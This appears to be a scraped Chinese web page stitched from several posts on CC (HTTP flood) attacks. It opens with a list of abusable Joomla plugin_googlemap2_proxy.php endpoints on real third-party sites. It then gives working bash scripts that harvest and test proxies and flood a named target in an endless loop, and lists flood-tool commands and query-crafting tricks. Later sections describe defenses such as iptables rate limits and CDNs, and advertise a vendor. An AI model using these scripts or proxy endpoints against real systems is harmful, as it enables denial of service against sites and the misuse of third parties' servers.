    http://www.pyrenees-cerdagne.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.ravidassia-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.rethinkingjournalism.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.schnepper-melcher.de/files/schneppermelcher/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.sealyham.sk/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.siroki.it/newsite/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.soporteavanzado.com/jm/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.stannestifton.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.uchlhr.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.virmcc.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.visitsliven.com/bg/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.xn--horthaus-lwe-ejb.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.yigilca.gov.tr/_tr/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url=
    http://hillsidecountryclub.com/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://dom-kon.com/Joomla/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
    http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url=
    http://www.dunaexpert.hu/home/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
    http://www.stephanus-web.de/joomla1015/mambots/content/plugin_googlemap2_proxy.php?url=
    http://www.ski-club-baulmes.ch/site/mambots/content/plugin_googlemap2_proxy.php?url=
    http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=
    http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt
    

     

    转载于:https://www.cnblogs.com/bonelee/p/9237883.html

    展开全文
  • CC攻击工具实现与防御理论

    千次阅读 2014-07-08 13:49:31
    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击。 第一步:获取大量可用代理ip:port...

    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击。

    第一步:获取大量可用代理ip:port列表

    网上所处可见免费代理,我们使用http的GET方法抓取html文档,接着使用正则过滤出我们需要的ip port对,然后逐一验证各代理的可用性,最终得到可用的代理ip port对。

    #get proxy list
    declare proxyListFile="proxy.txt"          #抓取到的代理ip port对所存放的文件路径
    declare tmpFile=`mktemp`
    declare url
    declare line
    declare times
    declare ip
    declare port
    declare i
    declare j
    declare mod
     
    function quit() {
        rm -f $tmpFile
        exit "$1"
    }
     
    echo "get proxy list... please wait..."
     
    if [ -r "$proxyListFile" ]
    then
      rm -f $proxyListFile
    fi
     
    touch $proxyListFile
     
    for url in  " http://www.youdaili.cn/Daili/guonei/2215.html " \
                " http://www.youdaili.cn/Daili/guonei/2215_2.html" \
                " http://www.youdaili.cn/Daili/guonei/2215_3.html" \
                " http://www.youdaili.cn/Daili/guonei/2215_4.html "
    do
        if GET "$url" > $tmpFile
        then
            grep -oE '^.*.*$' "$tmpFile" | grep -Eo "([0-9]+)(\.[0-9]+){3}:([0-9]+)" \
            | sort -n | uniq | awk -F: '{ printf("%-15s  %s \n",$1,$2); }' >> $proxyListFile
        else
            exec 1>&2
            echo "error: get proxy list fail! chech the url:$url or the network"
            quit 1
        fi
    done
     
    echo "done. total `cat $proxyListFile | wc -l` proxy"
     
    quit 0
    #exit


    check_proxy.sh
    #!/bin/bash
     
    #get proxy list
    declare check_threads=10   
    declare line
    declare times
    declare ip
    declare port
    declare i
    declare j
    declare mod
     
    function quit() {
        exit "$1"
    }
     
    #echo "start check proxy's functionality..."
     
    #retarget the input file to stdin
    if [ "$#" -gt "0" ]
    then
        exec 0<$1
    else
        exec 1>&2
        echo "usage: bash $0 proxyListFile.txt"
        echo "error: must have one input arg"
        quit 1
    fi
     
    #check proxy's functionality
    times=0
    while read line
    do
        times=$((times+1))
        j=0
        for i in `echo $line | tr ' ' '\n' | grep -E '^[^\s].*$'`
        do
            j=$((j+1))
            if [ "$j" -eq 1 ]
            then
                ip=$i
            else
                port=$i
            fi
        done
        #echo "times=$times ip=$ip port=$port"
        # start test
        if GET -t 5 -p "http://$ip:$port" "http://baidu.com" &>/dev/null
        then 
            echo "$ip $port"
            echo ":) ip=$ip port=$port " &>/dev/null
        else
            echo "invalid ip=$ip port=$port : please check ip:host or network" &>/proc/self/fd/2
        fi &
        mod=$((times%check_threads))
        if [ "$mod" -eq "0" ]
        then
            wait
        fi
    done
     
    #close the fd of input file
    exec 0<&-
    quit 0
    #exit

    declare check_threads=10 #验证代理可用性时的并发数,看一下代码就会发现,我们使用的是GET http://baidu.com方法,所以,并发数请不要也太高 :) 除非你的目标就是……


    总结:应征入伍的士兵共计600人,经过考核的共计449人,如果你还想招募更多的士兵,奉劝一句,苦海无边,回头是岸。
    第二步:吹响战争号角

    笔者在一台VPS上建立了一个薄弱的靶机,各位读者请不要太暴力,测试一下就可以了,地址 http://eecs.cc:8080/


    cc.sh
    #!/bin/bash
     
    declare target_url="http://eecs.cc:8080/"
    declare get_timeout_sec=5
    declare line
    declare times
    declare ip
    declare port
    declare i
    declare j
     
    function quit() {
        exit "$1"
    }
     
    #retarget the input file to stdin
    if ! [ "$#" -gt "0" ]
    then
        exec 1>&2
        echo "challenge collapsar attack -- cc attack"
        echo "usage: bash $0 proxyListFile.txt"
        echo "error: must have one input arg"
        quit 1
    fi
     
    echo "report : total `cat $1 | wc -l` proxy-soldiers are ready for command"
    echo "command: target: $target_url"
    echo "command: start challenge collapsar attack   :)   amazing..."
     
    exec 0<$1
    #start challenge collapsar attack
     
    while true
    do
        times=0
        exec 0<&-
        exec 0<$1
        while read line
        do
            times=$((times+1))
            j=0
            for i in `echo $line | tr ' ' '\n' | grep -E '^[^\s].*$'`
            do
                j=$((j+1))
                if [ "$j" -eq 1 ]
                then
                    ip=$i
                else
                    port=$i
                fi
            done
            echo "times=$times ip=$ip port=$port"
            #single soldier attack
            if GET -t "$get_timeout_sec" -p "http://$ip:$port" "$target_url" &>/dev/null 
            then 
                echo "soldier$times attack $target_url :)"
            else
                echo "soldier$times attack $target_url miss"
            fi &
        done
        wait
    done
     
    #close the fd of input file
    exec 0<&-
    quit 0
    #exit


    读者可自行尝试攻击这个站点,然后使用浏览器访问查看服务器网络状况,此时大量连接处于TIME_WAIT状态,参考TCP状态机,这一状态为主动关闭一方的最终等待状态。

    应用层DDoS的防御理论:

      问题模型描述:

      每一个页面,都有其资源消耗权重,静态资源,权重较低,动态资源,权重较高。对于用户访问,有如下:

    用户资源使用频率=使用的服务器总资源量/s

      命题一:对于正常访问的用户,资源使用频率必定位于一个合理的范围,当然会存在大量正常用户共享ip的情况,这就需要日常用户访问统计,以得到忠实用户ip白名单。

      命题二:资源使用频率持续异常的,可断定为访问异常的用户。

     

      防御体系状态机:

      1.在系统各项资源非常宽裕时,向所有ip提供服务,每隔一段时间释放一部分临时黑名单中的ip成员;

      2.在系统资源消耗达到某一阈值时,降低Syn包接受速率,循环:分析最近时间的日志,并将访问异常的ip加入临时黑名单;

      3.若系统资源消耗慢慢回降至正常水平,则恢复Syn包接受速率,转到状态1;若目前策略并未有效地控制住系统资源消耗的增长,情况继续恶劣至一极限阈值,转到状态4;

      4.最终防御方案,使用忠实用户ip白名单、异常访问ip黑名单策略,其他访问可慢慢放入,直到系统资源消耗回降至正常水平,转到状态1。

     

     上述的防御状态机,对于单个攻击IP高并发的DDOS,变化到状态3时,效果就完全体现出来了,但如果防御状态机进行到4状态,则有如下两种可能:

      1.站点遭到了攻击群庞大的、单个IP低并发的DDOS攻击;

    2.站点突然间有了很多访问正常的新用户。

     建议后续工作:

      保守:站点应尽快进行服务能力升级。

    积极:尽所能,追溯攻击者。

      追溯攻击者:
        
    CC:proxy-forward-from-ip
    单个IP高并发的DDOS:找到访问异常的、高度可疑的ip列表,exploit,搜集、分析数据,因为一个傀儡主机可被二次攻占的概率很大(但不建议这种方法)
    单个IP低并发的DDOS:以前极少访问被攻击站点,但是在攻击发生时,却频繁访问我们的站点,分析日志得到这一部分ip列表

       追溯攻击者的过程中,snat与web proxy增加了追踪的难度,如果攻击者采用多个中继服务器的方法,追溯将变得极为困难。

          

    防御者:

    • 1.应对当前系统了如指掌,如系统最高负载、最高数据处理能力,以及系统防御体系的强项与弱点
    • 2.历史日志的保存、分析
    • 3.对当前系统进行严格安全审计
    • 4.上报公安相关部分,努力追溯攻击者
    • 5.网站,能静态,就一定不要动态,可采取定时从主数据库生成静态页面的方式,对需要访问主数据库的服务使用验证机制。
    • 6.防御者应能从全局的角度,迅速及时地发现系统正在处于什么程度的攻击、何种攻击,在平时,应该建立起攻击应急策略,规范化操作,免得在急中犯下低级错误

    对历史日志的分析这时将会非常重要,数据可视化与统计学的方法将会很有益处:

    1.分析每个页面的平均访问频率

    2.对访问频率异常的页面进行详细分析 分析得到ip-页面访问频率

    3.得到对访问异常页面的访问异常ip列表

    4.对日志分析得到忠实用户IP白名单

    5.一般一个页面会关联多个资源,一次对于这样的页面访问往往会同时增加多个资源的访问数,而攻击程序一般不会加载这些它不感兴趣的资源,所以,这也是一个非常好的分析突破点

    展开全文
  • 主要介绍了CCKiller:Linux轻量级CC攻击防御工具,秒级检查、自动拉黑和释放,需要的朋友可以参考下
  • 最简单易懂的CC攻击

    2018-10-13 12:14:20
    简单易懂 直接上手 网站提取IP 直接导入 实用
  • cc攻击工具,可以防一定量的CC攻击!
  • CC攻击讲解

    千次阅读 2019-01-09 09:41:52
    最麻烦的攻击手段是cc攻击。下面我祥细讲讲CC攻击之后有什么表现,如何防御,有Cc有什么攻击类型。   案例:视频直播用户,被黑客Cc攻击勒索金钱!   早些年,最早做视频直播的是在韩国,他们在中国周边,也...

    DDoS攻击势头愈演愈烈,除了攻击手法的多样化发展之外,udp攻击是相对比如好防御,这是四层流量攻击。最麻烦的攻击手段是cc攻击。下面我祥细讲讲CC攻击之后有什么表现,如何防御,有Cc有什么攻击类型。

     

    案例:视频直播用户,被黑客Cc攻击勒索金钱!

     

    早些年,最早做视频直播的是在韩国,他们在中国周边,也就是延边那些地区招了一些会说韩语的女孩子陪韩国大叔聊天,韩国大叔就会给礼品。一天收入好几个亿韩币,后来知道的人多了,竞争就大了。韩国那边就要上搜索引擎打广告(类似百度竞价),只要排名第一位,就被人攻击,主要手段是Cc攻击。

     

    这是我们用的第一款Cc攻击工具,当时就是神器呀,100个线程,1000个代理服务器,直接打刷死。

     

    现在我们知道,有攻击就防护。兵来将挡水来土掩,可不知道韩国金主怎么想的,也许是韩国那边社团文化比较深入人心,很多站长会交赎金的。比如现在搜索引擎上面有三个网站,第一个网站主被Cc攻击瘫痪之后,就会接到中国黑客电话,网站想正常吗?给钱吧,1千万你网站就可以打开了(1千万韩币)因为网站主一天赚上亿,怕麻烦就给钱了。结果呢?

     

    结果就搞笑了,给完赎金,网站还打不开,过了20分钟又接到另一拨黑客打电话,给钱,不给赎金你网站就打开。接着给。刚给完,又接到第三拨黑客打电话,前面都是假的,都是骗子,你网站是我攻击的。

     

     

    Cc攻击是什么?

     

    CC = Challenge Collapsar,意为“挑战黑洞”,其前身名为Fatboy攻击,是利用不断对网站发送连接请求致使形成拒绝服务的目的。业界之所以把这种攻击称为CC(Challenge Collapsar),是因为在DDOS攻击发展前期,绝大部分的DDOS攻击都能被业界知名的“黑洞”(Collapsar)抵挡住,而CC攻击的产生就是为了挑战“黑洞”,故而称之为Challenge Collapsar。攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一直到宕机崩溃。

     

     

     

     

    怎么判断自己是在被CC攻击

     

    CC攻击主要工作原理是耗资源,这就需要看是那种攻击方式,

     

     

    看抓包分析是否是通过多IP,刷新页面,如果是这是最典型的Cc攻击。

     

    如果cc攻击你网站打不开,指定会有一种资源耗尽,才会引发网站打不开,打开卡。

    可自行判断一下,是下列四种情况中的那一种。

     

    1,耗Cpu资源

    黑客用1万台肉鸡,刷新你网站动态页面,如果你程序不够健壮,cpu直接100%

     

    2,耗内存资源

    黑客只要刷新你动态页面中搜索数据库的内容,只要搜索量一大,内存占满。网站直接打不开或者是非常卡。

    3,耗I/o资源

    黑客找到上传文件,或者是下载文件的页面,在不停的上传与下载,磁盘资源点满

    4,耗带宽资源

    下面这个带宽接10G,攻击上来2G,能看流量占用多少,如果流量占满了,服务器直接掉包,掉线。网站一点都打不开。

    如果自己主机上不去,你可以问运营商要流量图,机房都有流量图的。

     

     

    CC攻击目标分类

     

    跟据我这十年的统计,在2006年之前主要是网站会被Cc攻击,2008年之后,cc攻击大概分为几类目标,

    60%是网站,http,https,p2p网站,博彩网站,

    35%是游戏,SF,假人攻击

    5%,其它类型 Tcp CC攻击。

     

     

     

    CC攻击工具都有什么?

     

     

    1. 超强CC攻击器:只要输入攻击目标服务器的IP地址,设置好相关参数即可进行攻击。可设置攻击线程、攻击频率,利用大量代理服务器形成僵尸网络(设置代理服务器ip列表)。CC攻击工具致命攻击V2.0有大量的代理服务器。暗影DDoS压力测试系统V2016。

    2. DDoSIM可用于模拟对目标服务器的DDoS攻击,能模拟几个僵尸主机(IP地址具有随机性),这些主机与目标服务器建立完整的TCP连接。连接完成后,DDoSim启动与侦听应用程序如HTTP服务器的会话(?模拟正常用户访问的url???---仅仅是针对80端口发起正常的http请求,url就是/,多线程支持)。

    3. Darkddoser通过僵尸网络发起http攻击。

    4. 使用Microsoft Web Application Stress工具模拟HTTP-DDoS 攻击,采用直接访问测试页面的方式发起攻击。三台攻击机,每台攻击机最高并发1000线程(基于频率可检测、实验设置低频。。。自写的工具),迫使服务器执行大量计算和数据库查询,每次攻击时间为5分钟。

    5. Web Apple Pid DDoS攻击器:可设置目标服务器的页面(静态/动态)(单一、多个,自写的工具)、攻击频率等。

    6. LOIC是Web应用程序的Dos/DDos攻击,它可用TCP数据包、UDP数据包、HTTP请求对目标网站进行Dos/DDos测试,攻击手段主要是以无限循环方式(无僵尸网络、单一url)发送数据。是一种淹没式工具,能产生大量流量,占满目标网络或应用资源,造成拒绝服务。

    7. XOIC仅支持win7以上的Windows平台,比LOIC增加了Testmode模式,可以测试攻击主机的性能。

    8. HOIC可以配置攻击脚本,实际靠大量的HTTP请求进行DoS。其具有如下特点:高速多线程的HTTP洪水攻击;一次可同时洪水攻击高达256个网站;内置脚本系统,允许自行修改设置脚本,用来阻挠DDoS攻击的防御措施,并增加DOS输出;能够选择攻击的线程数。

     

    9. HULK:针对Web的拒绝服务攻击工具。能够在web服务器上产生许多单一的伪造浏览,伪造常见的参数名称和参数值,绕开引擎的缓存池(单一url、GOMAXPROCS=4 HULKMAXPROCS=4096 hulk -site http://example.com/example.php 2>/tmp/errlog)。

    10. WAS(web application stress tool是微软的一款性能测试工具,可以通过有限的客户端模拟大量的虚拟用户,并发地访问预先确定的页面或网站的URLs。每一个虚拟用户都能精确地仿效真实用户并在真实浏览器和网站服务器之间进行交互(https://www.90.vc/archives/11,压测工具,录制脚本,可以多个url,多线程)。

    11. Hping是一个基于命令行,编码和解析的TCP/IP协议的开源工具。也可以用于发动DDOS攻击,常用于发动ICMP、SYN和UDP洪水攻击等(pass,无应用层ddos)。

    12. 利用Httperf模拟针对Web服务器的DDoS攻击:通过设置hostname/IP address、url、请求速率、连接总数和服务器的反馈时间来模拟不同强度的分布式拒绝服务攻击。过程中需控制多台僵尸主机(httperf --client=0/1 --server=[YOUR_DOMAIN] --port=443 --uri=/a.php --rate=100 --send-buffer=4096 --recv-buffer=16384 --ssl --num-conns=50 --num-calls=1000,单一url、不排除同时多个url并发)。

    采用Httperf与Autobench相结合的方式来模拟应用层DDoS攻击,访问的服务器对象为某一校园网站。首先,直接通过抓包工具libpcap捕获正常用户的访问行为及数据包情况(性能测试工具)。其次是模拟应用层DDoS攻击行为。然后,分别对一定时间段内正常访问IP及攻击用户IP的数据包进行分析处理,提取相应的指标,并对指标数据进行预处理(autobench 是一款基于httperf的Perl脚本。它会在一次测试中调用多次httperf来对web服务器进行测试,每次会按照给定的参数增加并发连接数,将 httperf的测试结果保存为CSV格式的文件)。

    13. SlowHTTPTest:可配置的应用层拒绝服务攻击测试攻击。可以模拟低带宽耗费下的DoS攻击,如慢速攻击、通过并发连接池进行的慢速读攻击等(SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。Slowhttptest的源码托管在Github:https://github.com/shekyan/slowhttptest, pass)。

    14. Slowloris:属于Perl程序,只需在对应的SDK中运行即可。其攻击分为探测、实施两个步骤。探测的主要目的是探测目标服务器连接超时时间。实施攻击时可用单台主机也可选择数台主机并发攻击,选择多台主机产生的攻击效果更大(攻击192.168.0.1路由器网关。slowloris.py -s 999 -ua 192.168.0.1 –s 999 发送999个socket包。-ua 使用随机User Agent。pass)。

    15. 通过Music Machines-HTTP真实数据集搭建模拟真实网站,使用BadBoy录制攻击脚本,使用Apache Jmeter模拟傀儡主机进行模拟攻击行为。Apache Jmeter用于测试服务器功能和测量服务器性能。可用于测试静态和动态Web程序的性能。可用于模拟服务器或服务器组、网络对象的重负载请求,从而测试其强度,并分析在不同负载类型下测试对象的整体性能。(http://www.cnblogs.com/TankXiao/p/4045439.html,压测工具,可以设置多个url,多线程)

    给你发怎么多工具,不让你攻击别人,自己网站上线的时候,自己先个压力测试,别上线1000人就直接拒绝服务,这样的系统,回去接着改。否则找神仙来也防护不了你的网站。

     

    黑客是怎么发起CC攻击的

     

    黑客攻击一般不会简单的刷新首页,而是会找你最薄弱的环节进行攻击,换句话说黑客会找到网站最占资源的页面进行分析。这是需要一定的分析能力的,一个网站一般什么地方最占资源呢?

     

    需要分析网站使用的脚本语言,asp,asp.net,php,jsp 常用的脚本语言,找到带参数的地方,进行测试。

     

    例 hmw.asp?id=xxx

     

    一般带参数都是要查询数据库,

    select * from Artilce where id="id"

    而且如何使用cdn加速,也需要回源查询.一般的参数都不是最占资源的,黑客如果想刷新的源服务器,一般都是找搜索的地方,

     

    Get

    http://bbs.77169.com/searcher.php?kay=“搜索内容”

    如果是Get搜索,是黑客Cc攻击的重要页面

    Post

    http://bbs.77169.com/searcher.php

    有些搜索是post提交,黑客也会选择。

     

    原理很简单

    Artilce表,有1亿条数据,

    一条查询语句,如果查询成功还好,如果查询失败黑客给了一个不存在的值,他需要查询完1亿条数据,查完全部数据库,

    只需要提交100条,一般服务器就直接数据库卡死了。

    select * from Artilce where content like '%key%'

    下面黑客一般会怎么构造刷新的语句 

     

    程序可以自动生成随机字符,+表示随机字符标志+{N|U|L|C}+x N表示数字,U表示大写字母,L表示小写字母,C表示一个汉字,x是长度,规定为1-9。例子A+N1+U2+L3+C1BCD将可能生成A3BBcde%BA%CEBCD这样一个随机串攻击列表里面的添加规则{G|P}http://target.com:port/page.asp?id=+N3&name=+C3G表示Get模式 P表示POST模式,软件能够自己分辨出参数和HOST选项等等。

     

    比如Phttp://www.77169.com/abc.php?id=3 

    软件将用POST模式提交id=3到www.77169.com上面去

     

    攻击列表里面可以同时添加几个不同的服务器的URL,软件能够自动分别对待。

    实例操作是这样的

    分析有搜索页面

     

    http://www.test.com/searcher.php?kay=+N3&name=+C3G

     

    注意要选择随机攻击,随机字符。

     

    我们在被压力测试的目标主机抓包

     

     

    下面是日志分析生成的html页面,

     

    GET /searcher.php?kay=155&name=%C8%B1%F0%E2%E7%A0G

    GET /searcher.php?kay=155&name=%C8%B1%F0%E2%E7%A0G

     

    你看到多表,都是kay=3位随机数字&name=随机字符 。

    当代理主机ip主够多,刷新量最够大。黑客就达到了CC攻击的目的。

     

     

    CC攻击如何解决,如何防御?

     

     

    Cc攻击本质上是个什么问题?

    访问量超过现有资源使用率。

     

    比如你有一台服务器,每天正常有1万人访问,最大能支持每秒1000人同时访问。如果现在有每秒10万人访问,你服务器就会拒绝服务。

    超过你正常的访问量就一定是攻击吗?

     

    在国外idc,看来这个不是攻击。原因在于,有可能是正常访问。你还是一台服务器,今天将百度正常流量转到你的域名上,这些可能都正常用户,也没有用软件攻击,你服务器一样会拒绝服务。对吗?因为流量太大了。

     

    大家知道微博吧,没有人攻击他,微博也拒绝服务好几次,白话就是微博挂了。

    原因:赵丽颖冯绍峰亲自官宣结婚,一时间引爆微博,服务器迅速瘫痪。似乎印证了那一句,“发布结婚或者大八卦等消息的时候,能不能把微博服务器搞到崩溃,是检验明星咖位大小的重要标准之一!

     

     

    微博,没有人攻击,只要突然流量大了,也会拒绝服务。

     

    淘宝双11流量足够大吧?有一次他在春节联欢晚会上做了一个广告,

    结果呢?淘宝服务器挂了,原因,淘宝技术想法,我们先给资源能支持双11流量的3倍,结果是双11的10倍流量,淘宝也挂了。

     

    应对Cc攻击,理论只需要你的服务器数量与资源可以支持百万ip,每秒访问,服务就会正常。

     

    比如,你的服务器同时支持1万人在线,现在同时来10万人,你加20台服务器,一台平均分配到5000人在线,这不就解决问题了吗?那怕有9万是黑客ip.你也可以正常访问。

     

    所以不差钱,只需要加服务器加资源就可以。国外idc按流量收费,你Cc攻击大,正好收流量费,国外idc大部分不管你的。我就在美国刷爆过一张卡,买的美国丹佛机房的服务器,1T流量好像200美金,美国都是用信用卡流量超了自动扣费,有一天被人Cc攻击,5000美金被机房扣下来了,原因是流量跑超了。但是大部分客户都是投入与产出比的。每秒上千万Cc攻击的话,一天可能投入上百万。

     

    CC攻击防护策略,主要跟据攻击量而不同。

     

    Cc攻击量<10万/每秒

    Cc攻击如果10万ip,每秒10万左右连接,软件防火墙就可以解决。只需要软件策略就可以,软件比如,安全狗,云锁,这些软件不收钱。

     

    Cc攻击量>10万  and  Cc攻击量<100万

    Cc攻击如果在10~100万之间,软件防火墙解决不了,需要用到硬件防火墙。硬件,金盾,黑洞。如果有钱就买一个防火墙一般20~50万左右。一般这个攻击量,找idc机房或者是用cdn可以解决。

     

    Cc攻击量>100万  and  Cc攻击量<1000万

    Cc攻击如果在100~10000万之间,1台硬件防火墙解决不问题的。需要用到集群硬防。这个买一两个硬件是解决不了问题的,需要接入CDN或者是集群防护。

     

    CC攻击量上亿,每秒。

    市面上能买到软件与硬件都不好用,必须找人定制策略,定制防护方案。上亿的你可以考虑我们华安普特公司的3.0  全栈云化,立体式云防护。你可能要笑了,这广告打的。我们提供免费试用测试,防住之后再谈费用。防不住可以给你赔钱,不要不服可以来测试。

     

    接着我那个直播客户,怎么防住的。要防Cc先了解客户现在业务情况,没有一个防护方案是通用的,也没有一个硬件防火墙说不用调策略,直接适用所有类型的客户。

     

    客户这个分为网站,还有直播客户端两个流量来源。

    你看这个客户现在CDN节点,攻击流量每秒一个节点过百万,大概300万连接每秒。我们CDN云防节,一个节点100万并发左右。

     

    有攻击的节点,开启Cc防护识别,立马就下来,

    用anycast技术,进行分流。将超过100万每秒的流量进行分流,每个节点50万秒每秒,再用启用硬防策略。

     

     

    客户端接入我们sdk云防护,自动认别黑客的客户端,不给客户那边返回任何ip,不光防住了攻击。黑客手机mi码,手机号,ip都记下来下。下一步交给警方去处理,过几个月结果我再报告各位。

     

    BGP anycast 技术简介:

    利用一个(多个) as号码在不同的地区广播相同的一个ip段。
    利用bgp的寻路原则,短的as path 会选成最优路径(bgp寻路原则之n),从而优化了访问速度。

     

    其实bgp anycast是不同服务器用了相同的ip地址。我公司已经在俄罗斯,美国,韩国,香港,四个地区机房实现了anycast技术。

     

     

     

    sdk云防护技术简介:

    可以无限防Cc,不会误封ip,可以免费试用

    特点:

    无需修改源码集成,百万QPS级CC防护能力,分布式节点、弹性增减,多线路接入,TCP、HTTP/S层防护,实时阻断,低时延

     

    CC防御工具

     

    一般每秒1万个Cc连接之内,可以用到工具

    windows系统:

    云锁,安全狗,Cc终结者

     

    linux系统

    云锁,安全狗,

    iptables防火墙定制策略

     

    (1)控制单个IP的最大并发连接数

    iptables -I INPUT -p tcp --dport 80 -m connlimit  --connlimit-above 50 -j REJECT

     

     #允许单个IP的最大连接数为 30
    #默认iptables模块不包含connlimit,需要自己单独编译加载,编译内核加载connlimit模块

     

    (2)控制单个IP在一定的时间(比如60秒)内允许新建立的连接数

     

    iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 30 -j REJECT

     

    iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT


    #单个IP在60秒内只允许最多新建30个连接

     

    网站防护,你可以考虑用CDN,免费CDN

    http://www.aqcdn.net

    https://www.cloudflare.com/

    第一,CloudFlare

     

    CloudFlare算是比较大的国外免费CDN服务平台,提供免费和付费服务,一般我们使用主机的朋友都有清楚,甚至和CPANEL主机面板绑定可以给我们网站提速。如果是英文网站我们可以考虑使用,还具备防护攻击的作用,之前老左在linode的网站就被人无聊攻击,然后用CloudFlare就稍微好一些抵挡住。

    第二,Incapsula

     

    Incapsula是一家新加坡的CDN服务商,我们使用他的原因就是能够提供有新加坡节点的服务,英文网站使用肯定是没有问题,而且如果需要用到中文网站,新加坡节点速度对于国内的访问还是比较快的。去年老左有使用过,这家产品有时候一个月要维护好几次,不知道现在是否还这样。

    第三,TinyCDN

     

    TinyCDN是依靠亚马逊网络提供的CDN服务,主要还是收费用户免费的只能提供30天的试用,如果不怕折腾每月换一次的还是可以试试的。因为他们是主做付费的,所以免费用户我认为速度应该给予的不错,毕竟想忽悠我们升级付费嘛。

     

    CC攻击防御成功之后

     

     

    这不是给韩国几个哥们解决问题了吗?黑客群直接炸锅了,有些都直接上北京来问,谁能攻击这个网站呀,给钱呀,什么的。请教攻击方法的。我看到之后没干说是我给防御的。断了一些人财路,一直低调也没敢说。当年我们跟傲盾防火墙合作做的防御中心,

     

     

    这些朝鲜族人是真牛,直接给韩国的国际互联网打挂掉,中国防护好有什么用,韩国都连接不到中国的网络。怎么大的一个秘密,不是过去好多年,我都不敢说呀,这是我亲眼见到的,这边开始攻击,那个韩国互联网直接全断了,现在时间长了,互联网搜索不到韩国互联网断线的新闻了。有些做安全行业时间比较长的,应当会有印像。
     

    后来,因为黑客打不动中国自己防护,给韩国出口节点占满了,没办法只能给中国防护机器搬到韩国去做防护,现在韩国自己也有高防,但很坑,最多18G防护,多了没,韩国那边只要有攻击,上层运营商直接屏蔽ip.2019年1月1号之前,说有20G之上防护的韩国主机,都是吹牛皮的,别上当。因为那些防护就是我们中国人去做的。

     

    如果只有CC攻击,7层协议攻击防护不难,难度在于不影响正常客户。现在不可能只有一种攻击,黑客上来就是一套绷组合拳,ddos流量4层攻击,加Cc攻击,加syn变形攻击。攻防两端都在对抗中成长。有攻就有防,有防就会更新的攻击办法。

     

    早期防护主要原理是

     

    1. 早期的方法是对源 IP 的 HTTP 请求频率设定阈值,高于既定阈值的 IP 地址加入黑名单。这种方法过于简单,容易带来误杀,并且无法屏蔽来自代理服务器的攻击,因此逐渐废止,取而代之的是基于 JavaScript 跳转的人机识别方案。

    2.  

    3. HTTP Flood 是由程序模拟 HTTP 请求,一般来说不会解析服务端返回数据,更不会解析 JS之类代码。因此当清洗设备截获? HTTP 请求时,返回一段特殊 JavaScript 代码,正常用户的浏览器会处理并正常跳转不影响使用,而攻击程序会攻击到空处。 由于 HTTP/CC 攻击 的伪装方式千变万化,很少有策略或者硬件防护能做到完美清洗,所以,针对 HTTP/CC 攻击,我们大多时候需要具备一定技术的网络维护人员进行见招拆招。

     

    可以防护,但有一个最大的问题解决了。会误封ip,各硬件防火墙都说自己误封费是10万级,100万级。就是10个连接中会误封一个。我十几年测试经验告诉你,都是都吹牛的,实测试1万个连接中就会误封一个。如果这一个正好是网站大客户,这就亏大了。游戏有一个天天充钱的客户,你给他误封了。结果会损失很大。

     

    展开全文
